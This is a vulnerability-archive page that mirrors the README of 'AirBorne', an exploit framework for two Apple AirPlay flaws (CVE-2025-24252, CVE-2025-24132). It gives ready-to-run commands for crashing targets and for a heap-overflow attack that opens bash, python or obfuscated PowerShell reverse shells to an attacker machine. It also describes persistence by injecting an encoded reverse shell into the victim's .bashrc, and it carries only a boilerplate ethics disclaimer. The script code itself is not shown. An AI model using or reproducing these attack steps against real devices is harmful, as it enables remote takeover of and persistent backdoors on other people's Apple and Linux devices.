Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2025-24252 PoC — Apple iOS和Apple iPadOS 安全漏洞

Source
Associated Vulnerability
Title:Apple iOS和Apple iPadOS 安全漏洞 (CVE-2025-24252)
Description:A use-after-free issue was addressed with improved memory management. This issue is fixed in iOS 18.4 and iPadOS 18.4, iPadOS 17.7.6, macOS Sequoia 15.4, macOS Sonoma 14.7.5, macOS Ventura 13.7.5, tvOS 18.4, visionOS 2.4. An attacker on the local network may be able to corrupt process memory.
Description
poc for CVE-2025-24252 & CVE-2025-24132
Readme
# AirBorne PoC Framework – Elite RCE Edition

> **Full PoC Framework for CVE-2025-24252 & CVE-2025-24132**  
> By [ekomsSavior](https://github.com/ekomsSavior) | 

AirBorne is a combined proof-of-concept (PoC) framework targeting two serious vulnerabilities in Apple's AirPlay service. It includes a full crash trigger and a working reverse shell exploit with optional persistence, listener, and multiple payload formats — all in one script.

> 💾 **Looking for the original version?**  
> The legacy edition is still available in the `legacy` branch of this repository.  
> To check it out:

```bash
git checkout legacy
```

---

## CVEs Covered

### ✅ CVE-2025-24252 – mDNS TXT Record Crash
- Triggers a crash in the AirPlayReceiver daemon via a malformed mDNS packet
- Works over UDP broadcast on port 5353

### ✅ CVE-2025-24132 – Heap Overflow → Reverse Shell (RCE)
- Triggers a heap overflow in AirPlay's TCP service on port 7000
- Supports bash, python, and PowerShell reverse shell payloads
- Includes optional persistence using `.bashrc` injection (Linux)

---

## Getting Started

### 1. Clone the Repo

```bash
git clone https://github.com/ekomsSavior/AirBorne-PoC.git
cd AirBorne-PoC
```

### 2. Install Dependencies

```bash
sudo apt update
sudo apt install -y python3-scapy netcat
```

---

## Runtime Walkthrough

The single script `airborne.py` includes both PoCs and all logic:

* Select a CVE using `--exploit`
* Set a reverse shell payload using `--payload`
* Auto-starts a netcat listener for you
* Optionally enables persistence on target using `--persistent`

---

## Usage Examples

### Crash Target with mDNS Packet (CVE-2025-24252)

```bash
sudo python3 airborne.py --exploit 24252 --interface wlan0
```

> Requires an interface in monitor mode.

---

### Launch Heap Overflow → RCE (CVE-2025-24132)

Start full exploit with default bash shell:

```bash
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99
```

Choose Python shell instead:

```bash
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --payload python
```

Enable real persistence on Linux targets:

```bash
sudo python3 airborne.py --exploit 24132 --target 192.168.1.42 --attacker 192.168.1.99 --persistent
```

Only shell command einjection

```bash
sudo python3 airborne_bash_command_injector.py --exploit 24132 --target 192.168.1.42 --command "command"
```

---

## Payload Options

| Payload      | Description                                         |
| ------------ | --------------------------------------------------- |
| `bash`       | Default bash reverse shell over TCP                 |
| `python`     | Python-based reverse shell using `socket` and `pty` |
| `powershell` | Full Windows PowerShell RCE payload (obfuscated)    |

---

## Persistence Mode

When using `--persistent`, the script will append the encoded reverse shell payload to the target’s:

```bash
~/.bashrc
```

This ensures a shell is returned to you each time the user logs in or a terminal is spawned.

---

## Maintenance Notes

* Reverse shells are encoded using `base64` and delivered after buffer overflow
* All payloads are sent via port 7000
* mDNS packets go over UDP 5353 and require raw socket permission
* Make sure your attack box IP is reachable by the target device
* Script handles basic error cases and fails silently if closed ports

---

## Ethical Disclaimer

**This project is intended for educational, ethical, and authorized research only.**

* You must have explicit permission to test the target system.
* You assume full responsibility for any actions taken.

Unauthorized exploitation of systems is illegal and unethical.

---

## Credits

* Built by [ekomsSavior](https://github.com/ekomsSavior) 
* Inspired by real-world CVEs and exploit development research


File Snapshot

[4.0K] /data/pocs/86123e6c43ea15f615f0fac28a00a82b518090ad ├── [2.9K] airborne_bash_command_injector.py ├── [5.5K] airborne.py ├── [1.0K] LICENSE ├── [3.8K] README.md └── [2.6K] wireshark_data.pcapng 0 directories, 5 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →